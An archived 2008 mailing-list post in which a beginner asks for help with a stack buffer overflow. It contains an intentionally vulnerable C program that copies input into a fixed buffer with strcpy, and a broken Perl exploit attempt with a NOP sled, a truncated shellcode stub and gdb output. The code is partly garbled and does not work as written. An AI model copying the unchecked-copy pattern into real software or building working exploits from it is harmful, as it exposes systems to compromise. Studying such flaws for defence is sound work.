Simple Buffer Overflow

Date: Wed Jan 09 2008 - 21:09:46 EST

('binary' encoding is not supported, stored as-is) Hi there and thank you for reading this,

I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.

As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.

I've created this simple script: "test.c" :


#include <stdio.h>

int main(int argc, char **argv){

 char buffer[256];

 if (argc == 1) {
  printf("Usage: %s (input)", argv[0]);

 strcpy(buffer, argv[1]);

return 0;


Then I'm trying to exploit it with:



$ret = "/x90/x9a/xbf";

$shellcode = "\xb0\x0b".

$exploit = "\x90" x 235;
$exploit .= $shellcode;
$exploit .= $ret;

system("./a.out $exploit");


The shellcode is an execve /bin/sh.
When I run the perl script it simply returns my bash prompt. So the exploit didn't work.

When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" process.

Now the funny thing is when I overflow the buffer of a.out in gdb, with:
   run `perl -e 'print "A"x262'`
Program received signal SIGSEGV, Segmentation fault
0x08048412 in main ()

It doesn't overflow the EIP, because when I use:
   i r

It says:

eip 0x8048412 0x8048412 <main+126>

The first time I tried today it overflowed the EIP correctly and I didn't change anything.

ECX is 0x41414141 and
ESP is 0x4141413d
EBP is 0xbf004141

Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer?

I was wondering if someone was able to help me with this, because I really want to get the hang of this.

I don't know if I got the NOP sled and return address right either, because when using GDB:
    x/s $esp

I get:

0x4141413d: <Address 0x4141413d out of bounds

I'm kinda stuck from there.

My problem in short:

- How do I get a reliable return address with GDB
- How do I determine the length of the NOP sled
- How do I test shellcode

Thanks for reading this..
Thanks for any help, pointers and advice.


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